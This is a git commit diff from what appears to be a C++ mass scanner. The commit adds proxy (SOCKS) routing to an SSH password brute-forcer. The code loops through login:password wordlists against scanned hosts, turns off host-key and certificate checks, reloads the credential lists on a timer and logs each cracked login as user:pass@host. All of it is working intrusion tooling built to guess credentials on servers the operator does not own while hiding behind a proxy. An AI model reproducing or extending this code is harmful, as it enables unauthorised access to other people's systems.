Partially implemented ssh over socks

This commit is contained in:
cora48 2015-03-27 16:38:53 +03:00
parent a17df57d90
commit ff816f4645
4 changed files with 118 additions and 65 deletions

View File

@ -416,7 +416,6 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
long sz = getFileSize(fileName); long sz = getFileSize(fileName);
if(sz != *szPtr) { if(sz != *szPtr) {
FileUpdater::lk = std::unique_lock<std::mutex> (FileUpdater::filesUpdatingMutex); FileUpdater::lk = std::unique_lock<std::mutex> (FileUpdater::filesUpdatingMutex);
*szPtr = sz; *szPtr = sz;
funcPtr(); funcPtr();
@ -428,13 +427,26 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
int FileUpdater::updateLists() { int FileUpdater::updateLists() {
while(globalScanFlag) { while(globalScanFlag) {
Sleep(60000);
if(!globalScanFlag) break;
loadOnce();
}
}
int FileUpdater::loadOnce() {
updateList("negatives.txt", &oldNegLstSize, updateNegatives); updateList("negatives.txt", &oldNegLstSize, updateNegatives);
updateList("login.txt", &oldLoginLstSize, updateLogin); updateList("login.txt", &oldLoginLstSize, updateLogin);
updateList("pass.txt", &oldPassLstSize, updatePass); updateList("pass.txt", &oldPassLstSize, updatePass);
updateList("sshpass.txt", &oldSSHLstSize, updateSSH); updateList("sshpass.txt", &oldSSHLstSize, updateSSH);
updateList("wflogin.txt", &oldWFLoginLstSize, updateWFLogin); updateList("wflogin.txt", &oldWFLoginLstSize, updateWFLogin);
updateList("wfpass.txt", &oldWFPassLstSize, updateWFPass); updateList("wfpass.txt", &oldWFPassLstSize, updateWFPass);
}
Sleep(60000); void FileUpdater::FUClear() {
} oldNegLstSize = 0;
oldLoginLstSize = 0;
oldPassLstSize = 0;
oldSSHLstSize = 0;
oldWFLoginLstSize = 0;
oldWFPassLstSize = 0;
} }

View File

@ -26,8 +26,8 @@ public:
public: public:
static int updateLists(); static int updateLists();
static void passLoginLoader(); static int loadOnce();
static void negativeLoader(); static void FUClear();
}; };
#endif // FILEUPDATER_H #endif // FILEUPDATER_H

View File

@ -1,54 +1,97 @@
#include "SSHAuth.h" #include "SSHAuth.h"
#include "FileUpdater.h" #include "FileUpdater.h"
int _sshConnect(char *user, char *pass, const char *host, int port) int _sshConnect(const char *user, const char *pass, const char *host, int port) {
{
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L);
char hostStr[128] = {0}; char hostStr[128] = {0};
ZeroMemory(hostStr, sizeof(hostStr)); ZeroMemory(hostStr, sizeof(hostStr));
strcpy(hostStr, user); strcpy(hostStr, user);
strcat(hostStr, "@"); strcat(hostStr, "@");
strcat(hostStr, host); strcat(hostStr, host);
int sshTimeout = gTimeOut + 1;
ssh_session my_ssh_session = ssh_new(); if (curl)
if (my_ssh_session == NULL)
{ {
ssh_free(my_ssh_session); curl_easy_setopt(curl, CURLOPT_URL, host);
curl_easy_setopt(curl, CURLOPT_PORT, port);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
int proxyPort = std::atoi(gProxyPort);
if(strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
} else {
curl_easy_setopt(curl, CURLOPT_PROXY, "");
}
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut);
curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L);
int res = curl_easy_perform(curl);
socket_t sock;
curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock);
if(res != CURLE_OK) {
curl_easy_cleanup(curl);
++ssh;
stt->doEmitionRedFoundData("[SSH]Cannot connect to: " + QString(host) + ":" + QString::number(port));
return 0;
}
if(sock != -1) {
ssh_session ssh_session = ssh_new();
if (ssh_session == NULL)
{
ssh_free(ssh_session);
curl_easy_cleanup(curl);
return -1; return -1;
}; };
ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, hostStr); ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
ssh_options_set(my_ssh_session, SSH_OPTIONS_PORT, &port); ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
ssh_options_set(my_ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0); ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout);
ssh_options_set(my_ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
ssh_options_set(my_ssh_session, SSH_OPTIONS_TIMEOUT, &(gTimeOut + 1));
int rc = ssh_connect(my_ssh_session); //Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700
res = ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock);
if (rc != SSH_OK) res = ssh_connect(ssh_session);
if (res != SSH_OK) //Offline
{ {
ssh_disconnect(my_ssh_session); ssh_disconnect(ssh_session);
ssh_free(my_ssh_session); ssh_free(ssh_session);
curl_easy_cleanup(curl);
++offlines; ++offlines;
return -2; return -2;
} }
else else
{ {
rc = ssh_userauth_password(my_ssh_session, NULL, pass); res = ssh_userauth_password(ssh_session, NULL, pass);
if (rc != SSH_AUTH_SUCCESS) if (res != SSH_AUTH_SUCCESS)
{ {
ssh_disconnect(my_ssh_session); ssh_disconnect(ssh_session);
ssh_free(my_ssh_session); ssh_free(ssh_session);
curl_easy_cleanup(curl);
return -1; return -1;
}; };
}; };
ssh_disconnect(my_ssh_session);
ssh_free(my_ssh_session); ssh_disconnect(ssh_session);
ssh_free(ssh_session);
} else {
stt->doEmitionRedFoundData("[SSH]Socket = -1 " + QString(host) + ":" + QString::number(port));
}
}
curl_easy_cleanup(curl);
++ssh; ++ssh;
return 0; return 0;
} }
char _get_ssh_banner(const char *ip, int port) char _get_ssh_banner(const char *ip, int port) {
{
char recvBuff[256] = {0}; char recvBuff[256] = {0};
std::string buffer; std::string buffer;
Connector::nConnect(ip, port, &buffer); Connector::nConnect(ip, port, &buffer);
@ -63,14 +106,17 @@ char _get_ssh_banner(const char *ip, int port)
return *recvBuff; return *recvBuff;
} }
int check_ssh_pass(char *user, char *pass, char *userPass, const char *host, int port, std::string *buffer, const char *banner) int check_ssh_pass(const char *user, const char *pass,
{ const char *userPass, const char *host, int port,
std::string *buffer, const char *banner) {
int res = -1; int res = -1;
if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host) + ":" + QString::number(port)); if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(userPass) + "@" + QString(host) + ":" + QString::number(port));
res = _sshConnect(user, pass, host, port); res = _sshConnect(user, pass, host, port);
if(res == 0) if(res == 0)
{ {
stt->doEmition_BAGreenData("[+] SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host)); stt->doEmition_BAGreenData("[+] SSH: " + QString(userPass) + "@" + QString(host));
buffer->append(userPass); buffer->append(userPass);
buffer->append("@"); buffer->append("@");
buffer->append(host); buffer->append(host);
@ -78,22 +124,19 @@ int check_ssh_pass(char *user, char *pass, char *userPass, const char *host, int
buffer->append(banner); buffer->append(banner);
return 0; return 0;
}; };
return res; return res;
} }
int SSHBrute(const char* host, int port, std::string *buffer, const char *banner) int SSHBrute(const char* host, int port, std::string *buffer, const char *banner) {
{
char login[32] = {0}; char login[32] = {0};
char pass[32] = {0}; char pass[32] = {0};
char temp[64] = {0}; char temp[64] = {0};
BruteUtils::BConInc();
int sz = 0;
char *ptr1 = 0; char *ptr1 = 0;
int res = -1; int res = -1;
for(int i = 0; i < MaxSSHPass; ++i) for(int i = 0; i < MaxSSHPass; ++i)
{ {
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
if(!globalScanFlag) break; if(!globalScanFlag) break;
strcpy(temp, sshlpLst[i]); strcpy(temp, sshlpLst[i]);
ptr1 = strstr(temp, ":"); ptr1 = strstr(temp, ":");
@ -103,12 +146,9 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
return -1; return -1;
} }
sz = ptr1 - temp; strncpy(login, temp, ptr1 - temp);
strncpy(login, temp, sz);
strcpy(pass, ptr1 + 1); strcpy(pass, ptr1 + 1);
res = check_ssh_pass(login, pass, temp, host, port, buffer, banner); res = check_ssh_pass(login, pass, temp, host, port, buffer, banner);
ZeroMemory(login, sizeof(login)); ZeroMemory(login, sizeof(login));
ZeroMemory(pass, sizeof(pass)); ZeroMemory(pass, sizeof(pass));
ZeroMemory(temp, sizeof(temp)); ZeroMemory(temp, sizeof(temp));
@ -116,18 +156,15 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
if(res == 0) if(res == 0)
{ {
if(i == 0) return -2; //Failhit if(i == 0) return -2; //Failhit
BruteUtils::BConDec();
return 1; return 1;
} }
else if(res == -2) else if(res == -2)
{ {
BruteUtils::BConDec();
return -2; return -2;
}; };
Sleep(500); Sleep(500);
}; };
BruteUtils::BConDec();
return -1; return -1;
} }
@ -138,7 +175,10 @@ int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer)
const char &banner = _get_ssh_banner(ip, port); const char &banner = _get_ssh_banner(ip, port);
if(strlen(&banner) > 0) if(strlen(&banner) > 0)
{ {
return SSHBrute(ip, port, buffer, &banner); BruteUtils::BConInc();
int res = SSHBrute(ip, port, buffer, &banner);
BruteUtils::BConDec();
return res;
}; };
return -1; return -1;
} }

View File

@ -1825,7 +1825,7 @@ int startScan(char* args) {
stt->doEmitionIPRANGE(QString("--")); stt->doEmitionIPRANGE(QString("--"));
stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads)); stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads));
FileUpdater::loadOnce();
runAuxiliaryThreads(); runAuxiliaryThreads();
if (gMode == 0) if (gMode == 0)
@ -2115,6 +2115,7 @@ int startScan(char* args) {
} }
void nCleanup(){ void nCleanup(){
FileUpdater::FUClear();
Threader::cleanUp(); Threader::cleanUp();
curl_global_cleanup(); curl_global_cleanup();